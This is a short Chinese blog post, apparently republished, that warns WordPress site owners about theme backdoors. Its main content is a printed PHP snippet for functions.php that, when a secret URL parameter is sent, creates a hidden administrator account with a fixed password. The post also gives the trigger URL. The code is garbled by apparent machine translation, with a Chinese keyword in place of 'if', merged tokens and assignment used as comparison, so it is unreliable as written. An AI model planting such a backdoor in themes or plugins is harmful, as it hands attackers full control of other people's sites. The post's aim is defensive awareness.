防范wordpress主题加后门代码获取管理员权限

防范wordpress主题加后门代码获取管理员权限,第1张

防范wordpress主题加后门代码获取管理员权限

给WordPress主题留个侧门只需要两行代码,所以要小心。


复制以下代码:
Add_Action('WP_Head','My_backdoor');
functionmy_backdoor(){
if(MD5($_GET['backdoor'])='34D1f91FB2e514b8576fab1a75a89a6b'){
require('WP-includes/registration.PHP');
如果(!username_exists('后门'){
$user_id=wp_create_user('后门','pa55w0rd!');
$User=newWP_User($User_id);
$user->;set_role('管理员');
}
}
}

简单地说,代码的关键在functions.php文件中,它不容易危及所有应用程序。如果有这个代码,大家应该 *** 作http://www.yourwebsitedomainname.com/?后门=go,然后建立了一个名为“后门”的客户,登录密码为“pa55w0rd!”管理人员。我有和管理者一样的管理权限,非常擅长写主题代码文档。我坚信,此时此刻你一定感到非常危险。请快速检查您自己的主题代码...

欢迎分享,转载请注明来源:内存溢出

原文地址:https://www.54852.com/zz/772487.html

(0)
打赏 微信扫一扫微信扫一扫 支付宝扫一扫支付宝扫一扫
上一篇 2022-05-03
下一篇2022-05-03

发表评论

登录后才能评论

评论列表(0条)

    保存